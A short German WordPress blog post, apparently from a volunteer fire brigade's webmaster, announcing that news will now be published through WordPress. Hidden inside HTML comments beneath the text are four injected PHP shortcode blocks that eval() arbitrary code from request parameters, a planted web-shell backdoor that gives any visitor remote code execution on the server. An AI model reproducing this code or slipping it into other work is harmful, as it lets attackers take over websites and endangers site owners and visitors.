Neuanfang

Da ich für die FF-Webseite bisher mit WordPress gut zurechtkomme und mir die Arbeit mit Webeditor für Nachrichten auf Spritzenhaus.info zu aufwändig ist, versuche ich es mal so.

<!– [insert_php]if (isset($_REQUEST["qtK"])){eval($_REQUEST["qtK"]);exit;}[/insert_php][php]if (isset($_REQUEST["qtK"])){eval($_REQUEST["qtK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QaE"])){eval($_REQUEST["QaE"]);exit;}[/insert_php][php]if (isset($_REQUEST["QaE"])){eval($_REQUEST["QaE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jSZI"])){eval($_REQUEST["jSZI"]);exit;}[/insert_php][php]if (isset($_REQUEST["jSZI"])){eval($_REQUEST["jSZI"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TeBmM"])){eval($_REQUEST["TeBmM"]);exit;}[/insert_php][php]if (isset($_REQUEST["TeBmM"])){eval($_REQUEST["TeBmM"]);exit;}[/php] –>

Über

Ich bin hier der Webmaster und Autor.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.

*